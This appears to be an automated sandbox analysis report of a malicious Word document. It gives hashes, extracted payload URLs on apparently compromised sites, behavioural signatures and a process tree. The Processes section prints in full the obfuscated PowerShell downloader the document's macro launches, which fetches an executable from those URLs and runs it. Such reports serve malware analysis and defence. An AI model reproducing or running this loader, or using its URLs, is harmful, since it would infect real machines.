Analysis
-
max time kernel
133s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 19:19
Static task
static1
Behavioral task
behavioral1
Sample
d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc
Resource
win10v2004-20241007-en
General
-
Target
d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc
-
Size
239KB
-
MD5
50bdb4343c0816c1908b32ff2ba9cea3
-
SHA1
4ab1840794b41baf7c344663dc4013e45a3bc0ae
-
SHA256
d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18
-
SHA512
26f6db8694329f87e458da7fefef5e1a468f2b57aa1574e414ba20edb12c3c899f4cad69d17dec7752ff54880126ff69c3eba5491cae19d550887d373e2f1052
-
SSDEEP
3072:Di8rNzbWOlrV1c231w8N6eXENf7KnEhJivKie6B/w2yiWydwJt3MP0iIepuxQt/:UJiP/w2P83NikmV
Malware Config
Extracted
http://tuankhoi.com/wp-content/CI2oG/
https://www.microsystem.fr/newsletters/uITRJ/
https://natfast.com/wp-content/geeVh/
https://blog.smyrnaweb.com/cgi-bin/Kzd0vdC/
https://mhkhardware.com/cgi-bin/Mrn/
https://ostemeda.lt/wp-content/S/
https://blog.techforing.com/wp-includes/3XgEg7/
https://techzslack.com/wp-includes/gSXf/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3628 1600 POwersheLL.exe 82 -
Blocklisted process makes network request 7 IoCs
flow pid Process 23 3628 POwersheLL.exe 26 3628 POwersheLL.exe 30 3628 POwersheLL.exe 33 3628 POwersheLL.exe 36 3628 POwersheLL.exe 40 3628 POwersheLL.exe 42 3628 POwersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 392 WINWORD.EXE 392 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3628 POwersheLL.exe 3628 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3628 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 392 WINWORD.EXE 392 WINWORD.EXE 392 WINWORD.EXE 392 WINWORD.EXE 392 WINWORD.EXE 392 WINWORD.EXE 392 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:392
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD     $ L E 5 b 0 o   =     [ t y P E ] ( " { 5 } { 1 } { 3 } { 0 } { 2 } { 4 } " - F   ' M . ' , ' y s T ' , ' i o . d i R e C T O ' , ' e ' , ' R y ' , ' S ' )     ; s e T   e h o   (     [ T y P E ] ( " { 7 } { 5 } { 4 } { 6 } { 1 } { 8 } { 2 } { 3 } { 0 } "   - F ' A g E R ' , ' S E R v ' , ' C e P O I N T ' , ' m A N ' , ' . N E ' , ' t e M ' , ' t . ' , ' s y S ' , ' i ' )   ) ;     $ M 7 i v 6 i 2 = ( ( ' V t v ' + ' 2 ' ) + ( ' h ' + ' p r ' ) ) ; $ Z 1 v b t n y = $ D n k 2 2 c s   +   [ c h a r ] ( 6 4 )   +   $ F 4 s c t i 2 ; $ F q u y f d x = ( ( ' Y 4 ' + ' z ' ) + ( ' n r ' + ' c q ' ) ) ;     $ L E 5 B 0 o : : " C ` R E A t ` E D i ` R e c t o R Y " ( $ H O M E   +   ( ( ' { ' + ' 0 } ' + ( ' G z c s 8 ' + ' b ' ) + ' 5 { 0 } E e m ' + ' p w r r { 0 } ' )   - f   [ c h A R ] 9 2 ) ) ; $ Q 9 l i h 2 p = ( ' J ' + ' 5 ' + ( ' n c ' + ' 1 y 2 ' ) ) ;   $ e h O : : " s e C ` U R i T y ` P R o t o ` C ` o L "   =   ( ( ' T ' + ' l s ' ) + ' 1 2 ' ) ; $ U d s 2 6 5 k = ( ' T ' + ' i ' + ( ' 4 0 o f ' + ' 9 ' ) ) ; $ U 4 7 u p 4 v   =   ( ' J ' + ( ' 3 p ' + ' w 9 s ' ) ) ; $ M b e k l 1 v = ( ( ' G b ' + ' d ' ) + ' u o ' + ' v z ' ) ; $ V x k s 0 0 q = ( ' F ' + ' 7 ' + ( ' j ' + ' z 9 j f ' ) ) ; $ C s 7 u q 4 r = $ H O M E + ( ( ' 1 6 ' + ( ' V G z ' + ' c ' ) + ( ' s 8 ' + ' b 5 1 ' ) + ( ' 6 V E e m ' + ' p ' ) + ( ' w r r ' + ' 1 6 V ' ) ) - c R E P l A c e     ( [ C h A r ] 4 9 + [ C h A r ] 5 4 + [ C h A r ] 8 6 ) , [ C h A r ] 9 2 ) + $ U 4 7 u p 4 v + ( ' . ' + ( ' e ' + ' x e ' ) ) ; $ H 4 a 1 2 t 0 = ( ( ' E 7 ' + ' t 8 ' ) + ' l ' + ' v u ' ) ; $ U g w g _ 3 v = . ( ' n e w ' + ' - o b j e ' + ' c t ' )   N E t . W E B c l I E n T ; $ L x d e h r a = ( ( ( ( ' h t t p : ] [   1 ) ' + '   j j k g S   [ ' + ' ] ' + '   ' ) ) + ( ( ' [ ] w ] [   1 ) ' + '   j j k g S   [ ]   [ ] w t u a n k ' + ' h o i . c o m ] [   1 )   ' + ' j j ' + ' k g S ' + '   [ ]   [ ] w w p ' + ' - c o n t e n ' + ' t ] ' + ' [   ' + ' 1 ' + ' )   j j ' + ' k g ' + ' S ' + '   [ ] ' + '   ' + ' [ ] w C I ' + ' 2 ' + ' o G ' + ' ] [   1 )   j ' + ' j k g S ' + '   [ ] ' + '   [ ] w @ h t t p ' + ' s : ] ' + ' [   1 ' + ' )   j j ' + ' k g ' + ' S   [ ]   [ ] ' + ' w ] ' + ' [   1 )   j j k g S ' + '   ' ) ) + ( ( ' [ ]   ' + ' [ ] w w w w . m i ' + ' c r o s ' + ' y ' + ' s t e ' + ' m . f ' + ' r ] [   ' + ' 1 )   j j ' + ' k g S   [ ]   [ ] w n e w s l e t t e r s ] ' + ' [   1 )   ' + ' j j k g ' + ' S   [ ] ' + '   ' + ' [ ] ' + ' w u ' + ' I ' + ' T ' + ' R J ' + ' ] [ ' + '   1 ' + ' )   j j ' ) ) + ( ( ' k g S   ' + ' [ ]   [ ] w @ h t t p s : ' + ' ] [ ' + '   1 )   j j k g S   [ ]   [ ] w ] [   1 )   j j ' + ' k g S ' + '   [ ]   [ ' + ' ] ' + ' w n ' + ' a ' ) ) + ( ( ' t f ' + ' a s t . c o m ' + ' ] [   1 ' + ' )   j j k g S ' + '   [ ] ' + '   [ ' + ' ] w ' + ' w p - ' + ' c ' + ' o n t e ' + ' n t ] [   1 )   ' + ' j ' + ' j ' + ' k ' ) ) + ( ( ' g S   ' + ' [ ] ' + '   ' + ' [ ' + ' ] ' + ' w g e ' + ' e V h ] ' + ' [   1 )   ' + ' j j k ' + ' g S   [ ]   [ ] w @ h t ' + ' t p s ' + ' : ] [   1 ' + ' )   j j k ' + ' g S ' + '   ' + ' [ ]   [ ] ' + ' w ] ' ) ) + ( ( ' [   ' + ' 1 )   ' + ' j j k g S ' + '   [ ]   [ ] w b l o ' + ' g . ' + ' s m y r ' + ' n a w e b ' ) ) + ( ( ' . c ' + ' o m ' + ' ] [   1 )   j j k g S   ' + ' [ ]   [ ] ' + ' w ' + ' c g i - ' + ' b i n ' + ' ] ' + ' [   1 ' + ' )   j j ' + ' k ' + ' g S ' + '   [ ' + ' ]   ' + ' [ ' + ' ] w K z ' + ' d 0 ' + ' v d C ] ' + ' [ ' + '   1 ) ' + '   j j k g S ' + '   [ ' + ' ]   [ ] w @ ' + ' h t t p s ' + ' : ] [   1 )   j j k g S   [ ]   ' + ' [ ] w ] [ ' + '   1 )   j j k g S   ' + ' [ ' + ' ]   [ ] w m ' + ' h k ' + ' h a ' + ' r d w a r e . c o m ] [   1 ) ' + '   j j k g S   [ ] ' ) ) + ( ( '   [ ] w c g i ' + ' - b i n ] [   1 )   ' + ' j ' + ' j k g ' + ' S   [ ] ' + '   [ ' + ' ] ' + ' w M r ' + ' n ] ' ) ) + ( ( ' [   1 )   ' + ' j ' + ' j ' + ' k g S   [ ]   [ ] w @ h ' + ' t t ' ) ) + ( ( ' p ' + ' s : ' + ' ] [   1 )   j j k g S ' + '   ' + ' [ ]   [ ] w ] [   1 )   j j ' + ' k g ' + ' S ' + '   [ ]   [ ' + ' ] w o ' + ' s t e m e d a . l ' + ' t ] ' ) ) + ( ( ' [   1 )   j j k ' + ' g ' + ' S   [ ] ' + '   [ ] w w p - c ' + ' o n t ' + ' e ' ) ) + ( ( ' n t ] [   1 )   j j ' + ' k g ' + ' S ' + '   ' ) ) + ( ( ' [ ]   [ ] w S ] ' + ' [   1 ) ' + '   j j k ' + ' g S   ' + ' [ ' + ' ]   [ ' + ' ] w @ h t t p s : ] ' + ' [   1 )   j j k g S ' + '   [ ] ' + '   [ ] w ] [   ' + ' 1 )   j j k g S   ' + ' [ ]   [ ] w b l ' + ' o g ' + ' . t e c h f o r i n g . ' + ' c ' + ' o m ' + ' ] [   ' + ' 1 ' + ' )   j j k g S ' + '   [ ]   [ ' ) ) + ( ( ' ] ' + ' w w p - i ' + ' n c l u ' + ' d e s ] [   ' + ' 1 )   j j k g S   [ ]   [ ] ' + ' w 3 X g E g 7 ] [ ' + '   1 )   j j ' + ' k g S ' + '   [ ]   ' + ' [ ] ' + ' w @ ' + ' h t t p s : ' + ' ] [   1 )   j j k g S   [ ' + ' ]   [ ] w ] [   1 )   j ' + ' j k g S ' + '   [ ' ) ) + ( ' ]   [ ] ' + ' w t e c h ' + ' z s l a ' + ' c ' ) + ( ' k . c o ' + ' m ' ) + ( ( ' ] [   1 )   j j k g ' + ' S ' + '   [ ]   [ ] ' + ' w w p - i n c l u ' + ' d e ' + ' s ' + ' ] ' ) ) + ( ( ' [   ' + ' 1 )   j j ' + ' k ' + ' g S   [ ]   [ ' ) ) + ( ( ' ] ' + ' w ' + ' g S X f ] [   1 ' + ' ) ' + '   j ' + ' j k g S   [ ' + ' ] ' ) ) + ( '   ' + ' [ ] w ' ) ) ) . " r e ` p l A C e " ( ( ( ( ' ] [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j k g ' + ' S ' ) + '   ' + ( ' [ ]   ' + ' [ ] w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " s p l ` i T " ( $ R 7 v 0 y a l   +   $ Z 1 v b t n y   +   $ P d c q r 7 o ) ; $ X q j w u 0 f = ( ( ' R _ m ' + ' c ' ) + ( ' q u ' + ' 2 ' ) ) ; f o r e a c h   ( $ Y c k z v l 8   i n   $ L x d e h r a ) { t r y { $ U g w g _ 3 v . " D O ` W N ` l o A d f i l E " ( $ Y c k z v l 8 ,   $ C s 7 u q 4 r ) ; $ I 1 a c y h _ = ( ( ' M s ' + ' f x ' ) + ( ' r ' + ' t 5 ' ) ) ; I f   ( ( . ( ' G e t - ' + ' I ' + ' t e m ' )   $ C s 7 u q 4 r ) . " L e ` N G ` T h "   - g e   3 5 4 2 9 )   { ( [ w m i c l a s s ] ( ( ' w i n 3 ' + ' 2 _ ' ) + ( ' P r o c ' + ' e ' ) + ' s s ' ) ) . " C R ` E ` A T E " ( $ C s 7 u q 4 r ) ; $ N a 6 m 0 _ 1 = ( ( ' H j y ' + ' y ' ) + ' i ' + ' d b ' ) ; b r e a k ; $ L d 2 7 m m z = ( ' Y e ' + ' c 5 ' + ( ' s 5 ' + ' g ' ) ) } } c a t c h { } } $ B v 9 t 7 k o = ( ' H ' + ( ' m o ' + ' 9 ' ) + ( ' l x ' + ' i ' ) ) 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f